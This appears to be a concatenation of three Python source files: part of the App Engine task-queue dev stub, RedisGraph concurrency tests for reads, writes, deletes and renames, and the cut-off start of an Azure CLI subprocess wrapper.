taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET) retry_count = max(0, random.randint(-10, 5)) task.set_retry_count(retry_count) task.set_execution_count(retry_count) if random.random() < 0.3: random_headers = [('nexus', 'one'), ('foo', 'bar'), ('content-type', 'text/plain'), ('from', 'user@email.com')] for _ in xrange(random.randint(1, 4)): elem = random.randint(0, len(random_headers) - 1) key, value = random_headers.pop(elem) header_proto = task.add_header() header_proto.set_key(key) header_proto.set_value(value) return task now_usec = _SecToUsec(time.time()) for _ in range(num_tasks): self._InsertTask(RandomTask()) class _TaskExecutor(object): """Executor for a task object. Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the httplib library to send it to the http server. """ def __init__(self, default_host, request_data): """Constructor. Args: default_host: a string to use as the host/port to connect to if the host header is not specified in the task. request_data: A request_info.RequestInfo instance used to look up state associated with the request that generated an API call. """ self._default_host = default_host self._request_data = request_data def _HeadersFromTask(self, task, queue): """Constructs the http headers for the given task. This function will remove special headers (values in BUILT_IN_HEADERS) and add the taskqueue headers. Args: task: The task, a TaskQueueQueryTasksResponse_Task instance. queue: The queue that this task belongs to, an _Queue instance. Returns: A list of tuples containing the http header and value. There may be be mutiple entries with the same key. """ headers = [] for header in task.header_list(): header_key_lower = header.key().lower() if header_key_lower == 'host' and queue.target is not None: headers.append( (header.key(), '.'.join([queue.target, self._default_host]))) elif header_key_lower not in BUILT_IN_HEADERS: headers.append((header.key(), header.value())) headers.append(('X-AppEngine-QueueName', queue.queue_name)) headers.append(('X-AppEngine-TaskName', task.task_name())) headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count()))) headers.append(('X-AppEngine-TaskETA', str(_UsecToSec(task.eta_usec())))) headers.append(('X-AppEngine-Fake-Is-Admin', '1')) headers.append(('Content-Length', str(len(task.body())))) if (task.has_body() and 'content-type' not in [key.lower() for key, _ in headers]): headers.append(('Content-Type', 'application/octet-stream')) headers.append(('X-AppEngine-TaskExecutionCount', str(task.execution_count()))) if task.has_runlog() and task.runlog().has_response_code(): headers.append(('X-AppEngine-TaskPreviousResponse', str(task.runlog().response_code()))) return headers def ExecuteTask(self, task, queue): """Construct a http request from the task and dispatch it. Args: task: The task to convert to a http request and then send. An instance of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task queue: The queue that this task belongs to. An instance of _Queue. Returns: Http Response code from the task's execution, 0 if an exception occurred. """ method = task.RequestMethod_Name(task.method()) headers = self._HeadersFromTask(task, queue) dispatcher = self._request_data.get_dispatcher() try: response = dispatcher.add_request(method, task.url(), headers, task.body() if task.has_body() else '', '0.1.0.2') except request_info.ModuleDoesNotExistError: logging.exception('Failed to dispatch task') return 0 return int(response.status.split(' ', 1)[0]) class _BackgroundTaskScheduler(object): """The task scheduler class. This class is designed to be run in a background thread. Note: There must not be more than one instance of _BackgroundTaskScheduler per group. """ def __init__(self, group, task_executor, retry_seconds, **kwargs): """Constructor. Args: group: The group that we will automatically execute tasks from. Must be an instance of _Group. task_executor: The class used to convert a task into a http request. Must be an instance of _TaskExecutor. retry_seconds: The number of seconds to delay a task by if its execution fails. _get_time: a callable that returns the current time in seconds since the epoch. This argument may only be passed in by keyword. If unset, use time.time. """ self._group = group self._should_exit = False self._next_wakeup = INF self._event = threading.Event() self._wakeup_lock = threading.Lock() self.task_executor = task_executor self.default_retry_seconds = retry_seconds self._get_time = kwargs.pop('_get_time', time.time) if kwargs: raise TypeError('Unknown parameters: %s' % ', '.join(kwargs)) def UpdateNextEventTime(self, next_event_time): """Notify the TaskExecutor of the closest event it needs to process. Args: next_event_time: The time of the event in seconds since the epoch. """ with self._wakeup_lock: if next_event_time < self._next_wakeup: self._next_wakeup = next_event_time self._event.set() def Shutdown(self): """Request this TaskExecutor to exit.""" self._should_exit = True self._event.set() def _ProcessQueues(self): with self._wakeup_lock: self._next_wakeup = INF now = self._get_time() queue, task = self._group.GetNextPushTask() while task and _UsecToSec(task.eta_usec()) <= now: if task.retry_count() == 0: task.set_first_try_usec(_SecToUsec(now)) response_code = self.task_executor.ExecuteTask(task, queue) if response_code: task.mutable_runlog().set_response_code(response_code) else: logging.error( 'An error occured while sending the task "%s" ' '(Url: "%s") in queue "%s". Treating as a task error.', task.task_name(), task.url(), queue.queue_name) now = self._get_time() if 200 <= response_code < 300: queue.Delete(task.task_name()) else: retry = Retry(task, queue) age_usec = _SecToUsec(now) - task.first_try_usec() if retry.CanRetry(task.retry_count() + 1, age_usec): retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1) logging.warning( 'Task %s failed to execute. This task will retry in %.3f seconds', task.task_name(), _UsecToSec(retry_usec)) queue.PostponeTask(task, _SecToUsec(now) + retry_usec) else: logging.warning( 'Task %s failed to execute. The task has no remaining retries. ' 'Failing permanently after %d retries and %d seconds', task.task_name(), task.retry_count(), _UsecToSec(age_usec)) queue.Delete(task.task_name()) queue, task = self._group.GetNextPushTask() if task: with self._wakeup_lock: eta = _UsecToSec(task.eta_usec()) if eta < self._next_wakeup: self._next_wakeup = eta def _Wait(self): """Block until we need to process a task or we need to exit.""" now = self._get_time() while not self._should_exit and self._next_wakeup > now: timeout = self._next_wakeup - now self._event.wait(timeout) self._event.clear() now = self._get_time() def MainLoop(self): """The main loop of the scheduler.""" while not self._should_exit: self._ProcessQueues() self._Wait() class TaskQueueServiceStub(apiproxy_stub.APIProxyStub): """Python only task queue service stub. This stub executes tasks when enabled by using the dev_appserver's AddEvent capability. When task running is disabled this stub will store tasks for display on a console, where the user may manually execute the tasks. """ def __init__(self, service_name='taskqueue', root_path=None, auto_task_running=False, task_retry_seconds=30, _all_queues_valid=False, default_http_server='localhost', _testing_validate_state=False, request_data=None): """Constructor. Args: service_name: Service name expected for all calls. root_path: Root path to the directory of the application which may contain a queue.yaml file. If None, then it's assumed no queue.yaml file is available. auto_task_running: When True, the dev_appserver should automatically run tasks after they are enqueued. task_retry_seconds: How long to wait between task executions after a task fails. _testing_validate_state: Should this stub and all of its _Groups (and thus and all of its _Queues) validate their state after each operation? This should only be used during testing of the taskqueue_stub. request_data: A request_info.RequestInfo instance used to look up state associated with the request that generated an API call. """ super(TaskQueueServiceStub, self).__init__( service_name, max_request_size=MAX_REQUEST_SIZE, request_data=request_data) self._queues = {} self._all_queues_valid = _all_queues_valid self._root_path = root_path self._testing_validate_state = _testing_validate_state self._queues[None] = _Group( self._ParseQueueYaml, app_id=None, _all_queues_valid=_all_queues_valid, _update_newest_eta=self._UpdateNextEventTime, _testing_validate_state=self._testing_validate_state) self._auto_task_running = auto_task_running self._started = False self._task_scheduler = _BackgroundTaskScheduler( self._queues[None], _TaskExecutor(default_http_server, self.request_data), retry_seconds=task_retry_seconds) self._yaml_last_modified = None def StartBackgroundExecution(self): """Start automatic task execution.""" if not self._started and self._auto_task_running: task_scheduler_thread = threading.Thread( target=self._task_scheduler.MainLoop) task_scheduler_thread.setDaemon(True) task_scheduler_thread.start() self._started = True def Shutdown(self): """Requests the task scheduler to shutdown.""" self._task_scheduler.Shutdown() def _ParseQueueYaml(self): """Loads the queue.yaml file and parses it. Returns: None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object populated from the queue.yaml. """ if hasattr(self, 'queue_yaml_parser'): return self.queue_yaml_parser(self._root_path) if self._root_path is None: return None for queueyaml in ( 'queue.yaml', 'queue.yml', os.path.join('WEB-INF', 'appengine-generated', 'queue.yaml')): try: path = os.path.join(self._root_path, queueyaml) modified = os.stat(path).st_mtime if self._yaml_last_modified and self._yaml_last_modified == modified: return self._last_queue_info fh = open(path, 'r') except (IOError, OSError): continue try: queue_info = queueinfo.LoadSingleQueue(fh) self._last_queue_info = queue_info self._yaml_last_modified = modified return queue_info finally: fh.close() return None def _UpdateNextEventTime(self, callback_time): """Enqueue a task to be automatically scheduled. Note: If auto task running is disabled, this function is a no-op. Args: callback_time: The earliest time this task may be run, in seconds since the epoch. """ self._task_scheduler.UpdateNextEventTime(callback_time) def _GetGroup(self, app_id=None): """Get the _Group instance for app_id, creating a new one if needed. Args: app_id: The app id in question. Note: This field is not validated. """ if app_id not in self._queues: self._queues[app_id] = _Group( app_id=app_id, _all_queues_valid=self._all_queues_valid, _testing_validate_state=self._testing_validate_state) return self._queues[app_id] def _Dynamic_Add(self, request, response): """Add a single task to a queue. This method is a wrapper around the BulkAdd RPC request. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: The taskqueue_service_pb.TaskQueueAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueAddResponse. See taskqueue_service.proto. """ bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest() bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse() bulk_request.add_add_request().CopyFrom(request) self._Dynamic_BulkAdd(bulk_request, bulk_response) assert bulk_response.taskresult_size() == 1 result = bulk_response.taskresult(0).result() if result != taskqueue_service_pb.TaskQueueServiceError.OK: raise apiproxy_errors.ApplicationError(result) elif bulk_response.taskresult(0).has_chosen_task_name(): response.set_chosen_task_name( bulk_response.taskresult(0).chosen_task_name()) def _Dynamic_BulkAdd(self, request, response): """Add many tasks to a queue using a single request. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See taskqueue_service.proto. """ assert request.add_request_size(), 'taskqueue should prevent empty requests' self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc( request, response) def GetQueues(self): """Gets all the application's queues. Returns: A list of dictionaries, where each dictionary contains one queue's attributes. E.g.: [{'name': 'some-queue', 'max_rate': '1/s', 'bucket_size': 5, 'oldest_task': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'tasks_in_queue': 12}, ...] The list of queues always includes the default queue. """ return self._GetGroup().GetQueuesAsDicts() def GetTasks(self, queue_name): """Gets a queue's tasks. Args: queue_name: Queue's name to return tasks for. Returns: A list of dictionaries, where each dictionary contains one task's attributes. E.g. [{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskRetryCount': '0'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. KeyError: An invalid queue name was specified. """ return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts() def DeleteTask(self, queue_name, task_name): """Deletes a task from a queue, without leaving a tombstone. Args: queue_name: the name of the queue to delete the task from. task_name: the name of the task to delete. """ if self._GetGroup().HasQueue(queue_name): queue = self._GetGroup().GetQueue(queue_name) queue.Delete(task_name) queue.task_name_archive.discard(task_name) def FlushQueue(self, queue_name): """Removes all tasks from a queue, without leaving tombstones. Args: queue_name: the name of the queue to remove tasks from. """ if self._GetGroup().HasQueue(queue_name): self._GetGroup().GetQueue(queue_name).PurgeQueue() self._GetGroup().GetQueue(queue_name).task_name_archive.clear() def _Dynamic_UpdateQueue(self, request, unused_response): """Local implementation of the UpdateQueue RPC in TaskQueueService. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. Not used. """ self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response) def _Dynamic_FetchQueues(self, request, response): """Local implementation of the FetchQueues RPC in TaskQueueService. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response) def _Dynamic_FetchQueueStats(self, request, response): """Local 'random' implementation of the TaskQueueService.FetchQueueStats. This implementation loads some stats from the task store, the rest with random numbers. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest. response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse. """ self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response) def _Dynamic_QueryTasks(self, request, response): """Local implementation of the TaskQueueService.QueryTasks RPC. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. """ self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response) def _Dynamic_FetchTask(self, request, response): """Local implementation of the TaskQueueService.FetchTask RPC. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response) def _Dynamic_Delete(self, request, response): """Local delete implementation of TaskQueueService.Delete. Deletes tasks from the task store. A 1/20 chance of a transient error. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. """ self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response) def _Dynamic_ForceRun(self, request, response): """Local force run implementation of TaskQueueService.ForceRun. Forces running of a task in a queue. This will fail randomly for testing if the app id is non-empty. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueForceRunRequest. response: A taskqueue_service_pb.TaskQueueForceRunResponse. """ if _GetAppId(request) is not None: if random.random() <= 0.05: response.set_result( taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR) elif random.random() <= 0.052: response.set_result( taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR) else: response.set_result( taskqueue_service_pb.TaskQueueServiceError.OK) else: group = self._GetGroup(None) if not group.HasQueue(request.queue_name()): response.set_result( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) return queue = group.GetQueue(request.queue_name()) task = queue.Lookup(1, name=request.task_name()) if not task: response.set_result( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK) return queue.RunTaskNow(task[0]) self._UpdateNextEventTime(0) response.set_result( taskqueue_service_pb.TaskQueueServiceError.OK) def _Dynamic_DeleteQueue(self, request, response): """Local delete implementation of TaskQueueService.DeleteQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest. response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse. """ app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) self._GetGroup(app_id).DeleteQueue_Rpc(request, response) def _Dynamic_PauseQueue(self, request, response): """Local pause implementation of TaskQueueService.PauseQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueuePauseQueueRequest. response: A taskqueue_service_pb.TaskQueuePauseQueueResponse. """ app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) self._GetGroup(app_id).PauseQueue_Rpc(request, response) def _Dynamic_PurgeQueue(self, request, response): """Local purge implementation of TaskQueueService.PurgeQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest. response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse. """ self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response) def _Dynamic_DeleteGroup(self, request, response): """Local delete implementation of TaskQueueService.DeleteGroup. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest. response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse. """ app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) if app_id in self._queues: del self._queues[app_id] else: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) def _Dynamic_UpdateStorageLimit(self, request, response): """Local implementation of TaskQueueService.UpdateStorageLimit. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest. response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse. """ if _GetAppId(request) is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) response.set_new_limit(request.limit()) def _Dynamic_QueryAndOwnTasks(self, request, response): """Local implementation of TaskQueueService.QueryAndOwnTasks. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. Raises: InvalidQueueModeError: If target queue is not a pull queue. """ self._GetGroup().QueryAndOwnTasks_Rpc(request, response) def _Dynamic_ModifyTaskLease(self, request, response): """Local implementation of TaskQueueService.ModifyTaskLease. Args: request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest. response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse. Raises: InvalidQueueModeError: If target queue is not a pull queue. """ self._GetGroup().ModifyTaskLease_Rpc(request, response) def get_filtered_tasks(self, url=None, name=None, queue_names=None): """Get the tasks in the task queue with filters. Args: url: A URL that all returned tasks should point at. name: The name of all returned tasks. queue_names: A list of queue names to retrieve tasks from. If left blank this will get default to all queues available. Returns: A list of taskqueue.Task objects. """ all_queue_names = [queue['name'] for queue in self.GetQueues()] if isinstance(queue_names, basestring): queue_names = [queue_names] if queue_names is None: queue_names = all_queue_names task_dicts = [] for queue_name in queue_names: if queue_name in all_queue_names: for task in self.GetTasks(queue_name): if url is not None and task['url'] != url: continue if name is not None and task['name'] != name: continue task_dicts.append(task) tasks = [] for task in task_dicts: payload = base64.b64decode(task['body']) headers = dict(task['headers']) headers['Content-Length'] = str(len(payload)) eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S') eta = eta.replace(tzinfo=taskqueue._UTC) task_object = taskqueue.Task(name=task['name'], method=task['method'], url=task['url'], headers=headers, payload=payload, eta=eta) tasks.append(task_object) return tasks
test_concurrent_query.py
import os import sys import threading from RLTest import Env from redisgraph import Graph, Node, Edge from redis import ResponseError from base import FlowTestsBase GRAPH_ID = "G" # Graph identifier. CLIENT_COUNT = 16 # Number of concurrent connections. graphs = None # One graph object per client. assertions = [True] * CLIENT_COUNT # Each thread places its verdict at position threadID. exceptions = [None] * CLIENT_COUNT # Each thread which fails sets its exception content ar position threadID. people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"] def query_aggregate(graph, query, threadID): global assertions assertions[threadID] = True for i in range(10): actual_result = graph.query(query) person_count = actual_result.result_set[0][0] if person_count != len(people): assertions[threadID] = False break def query_neighbors(graph, query, threadID): global assertions assertions[threadID] = True # Fully connected graph + header row. expected_resultset_size = len(people) * (len(people)-1) for i in range(10): actual_result = graph.query(query) if len(actual_result.result_set) is not expected_resultset_size: assertions[threadID] = False break def query_write(graph, query, threadID): global assertions assertions[threadID] = True for i in range(10): actual_result = graph.query(query) if actual_result.nodes_created != 1 or actual_result.properties_set != 1: assertions[threadID] = False break def thread_run_query(graph, query, threadID): global assertions try: assertions[threadID] = graph.query(query) except ResponseError as e: exceptions[threadID] = str(e) def delete_graph(graph, threadID): global assertions assertions[threadID] = True # Try to delete graph. try: graph.delete() except: # Graph deletion failed. assertions[threadID] = False class testConcurrentQueryFlow(FlowTestsBase): def __init__(self): self.env = Env() global graphs graphs = [] for i in range(0, CLIENT_COUNT): redis_con = self.env.getConnection() graphs.append(Graph(GRAPH_ID, redis_con)) self.populate_graph() def populate_graph(self): nodes = {} graph = graphs[0] # Create entities for p in people: node = Node(label="person", properties={"name": p}) graph.add_node(node) nodes[p] = node # Fully connected graph for src in nodes: for dest in nodes: if src != dest: edge = Edge(nodes[src], "know", nodes[dest]) graph.add_edge(edge) graph.commit() # Count number of nodes in the graph def test01_concurrent_aggregation(self): q = """MATCH (p:person) RETURN count(p)""" threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=query_aggregate, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertTrue(assertions[i]) # Concurrently get neighbors of every node. def test02_retrieve_neighbors(self): q = """MATCH (p:person)-[know]->(n:person) RETURN n.name""" threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=query_neighbors, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertTrue(assertions[i]) # Concurrent writes def test_03_concurrent_write(self): threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] q = """CREATE (c:country {id:"%d"})""" % i t = threading.Thread(target=query_write, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertTrue(assertions[i]) # Try to delete graph multiple times. def test_04_concurrent_delete(self): threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=delete_graph, args=(graph, i)) t.setDaemon(True) threads.append(t) t.start() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() # Exactly one thread should have successfully deleted the graph. self.env.assertEquals(assertions.count(True), 1) # Try to delete a graph while multiple queries are executing. def test_05_concurrent_read_delete(self): redis_con = self.env.getConnection() ############################################################################################## # Delete graph via Redis DEL key. ############################################################################################## self.populate_graph() q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x""" threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=thread_run_query, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() redis_con.delete(GRAPH_ID) # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertEquals(assertions[i].result_set[0][0], 900) # Make sure Graph is empty, e.g. graph was deleted. resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set self.env.assertEquals(resultset[0][0], 0) ############################################################################################## # Delete graph via Redis FLUSHALL. ############################################################################################## self.populate_graph() q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x""" threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=thread_run_query, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() redis_con.flushall() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertEquals(assertions[i].result_set[0][0], 900) # Make sure Graph is empty, e.g. graph was deleted. resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set self.env.assertEquals(resultset[0][0], 0) ############################################################################################## # Delete graph via GRAPH.DELETE. ############################################################################################## self.populate_graph() q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x""" threads = [] for i in range(CLIENT_COUNT): graph = graphs[i] t = threading.Thread(target=thread_run_query, args=(graph, q, i)) t.setDaemon(True) threads.append(t) t.start() graphs[i].delete() # Wait for threads to return. for i in range(CLIENT_COUNT): t = threads[i] t.join() self.env.assertEquals(assertions[i].result_set[0][0], 900) # Make sure Graph is empty, e.g. graph was deleted. resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set self.env.assertEquals(resultset[0][0], 0) def test_06_concurrent_write_delete(self): # Test setup - validate that graph exists and possible results are None graphs[0].query("MATCH (n) RETURN n") assertions[0] = None exceptions[0] = None redis_con = self.env.getConnection() heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)""" writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0)) writer.setDaemon(True) writer.start() redis_con.delete(GRAPH_ID) writer.join() possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID, "Encountered an empty key when opened key " + GRAPH_ID] if exceptions[0] is not None: self.env.assertContains(exceptions[0], possible_exceptions) else: self.env.assertEquals(1000000, assertions[0].nodes_created) def test_07_concurrent_write_rename(self): # Test setup - validate that graph exists and possible results are None graphs[0].query("MATCH (n) RETURN n") assertions[0] = None exceptions[0] = None redis_con = self.env.getConnection() new_graph = GRAPH_ID + "2" # Create new empty graph with id GRAPH_ID + "2" redis_con.execute_command("GRAPH.QUERY",new_graph, """MATCH (n) return n""", "--compact") heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)""" writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0)) writer.setDaemon(True) writer.start() redis_con.rename(new_graph, GRAPH_ID) writer.join() # Possible scenarios: # 1. Rename is done before query is sent. The name in the graph context is new_graph, so when upon commit, when trying to open new_graph key, it will encounter an empty key since new_graph is not a valid key. # Note: As from https://github.com/RedisGraph/RedisGraph/pull/820 this may not be valid since the rename event handler might actually rename the graph key, before the query execution. # 2. Rename is done during query executing, so when commiting and comparing stored graph context name (GRAPH_ID) to the retrived value graph context name (new_graph), the identifiers are not the same, since new_graph value is now stored at GRAPH_ID value. possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID, "Encountered an empty key when opened key " + new_graph] if exceptions[0] is not None: self.env.assertContains(exceptions[0], possible_exceptions) else: self.env.assertEquals(1000000, assertions[0].nodes_created) def test_08_concurrent_write_replace(self): # Test setup - validate that graph exists and possible results are None graphs[0].query("MATCH (n) RETURN n") assertions[0] = None exceptions[0] = None redis_con = self.env.getConnection() heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)""" writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0)) writer.setDaemon(True) writer.start() set_result = redis_con.set(GRAPH_ID, "1") writer.join() possible_exceptions = ["Encountered a non-graph value type when opened key " + GRAPH_ID, "WRONGTYPE Operation against a key holding the wrong kind of value"] if exceptions[0] is not None: # If the SET command attempted to execute while the CREATE query was running, # an exception should have been issued. self.env.assertContains(exceptions[0], possible_exceptions) else: # Otherwise, both the CREATE query and the SET command should have succeeded. self.env.assertEquals(1000000, assertions[0].nodes_created) self.env.assertEquals(set_result, True) def test_09_concurrent_multiple_readers_after_big_write(self): # Test issue #890 global assertions global exceptions redis_con = self.env.getConnection() redis_graph = Graph("G890", redis_con) redis_graph.query("""UNWIND(range(0,999)) as x CREATE()-[:R]->()""") read_query = """MATCH (n)-[r:R]->(m) RETURN n, r, m""" assertions = [True] * CLIENT_COUNT exceptions = [None] * CLIENT_COUNT threads = [] for i in range(CLIENT_COUNT): t = threading.Thread(target=thread_run_query, args=(redis_graph, read_query, i)) t.setDaemon(True) threads.append(t) t.start() for i in range(CLIENT_COUNT): t = threads[i] t.join() for i in range(CLIENT_COUNT): self.env.assertIsNone(exceptions[i]) self.env.assertEquals(1000, len(assertions[i].result_set))
azurecli.py
import json import os import signal import subprocess import sys from io import StringIO from threading import Thread, Timer from azure.cli.core import get_default_cli from fstrings import f from six.moves.queue import Empty, Queue from . import telemetry from .compat import PY2 if PY2: from .compat import FileNotFoundError output_io_cls = StringIO def get_query_argument_for_id_and_name(token): return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token) class AzureCli: def __init__(self, output, envvars, cli=get_default_cli()): self.output = output self.envvars = envvars self.az_cli = cli self.process = None self._proc_terminated = False def decode(self, val): return val.decode("utf-8").strip() def is_posix(self): return self.envvars.is_posix() def prepare_az_cli_args(self, args, suppress_output=False): if suppress_output: args.extend(["--query", "\"[?n]|[0]\""]) az_args = ["az"]+args return az_args def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None, suppress_output=False, timeout=None): try: if timeout: timeout = int(timeout) monitor_events = False if 'monitor-events' in args: monitor_events = True self._proc_terminated = False # Consider using functools if monitor_events: process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output), shell=not self.is_posix(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setsid if self.is_posix() else None, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0) elif stdout_io or stderr_io: process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=not self.is_posix()) else: process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output), shell=not self.is_posix()) self.process = process timer = None if timeout: # This Timer will attempt to be accurate but its not always the case in practice timer = Timer(float(timeout), self._terminate_process_tree, args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)]) try: if timer: timer.start() if not monitor_events: stdout_data, stderr_data = process.communicate() else: return 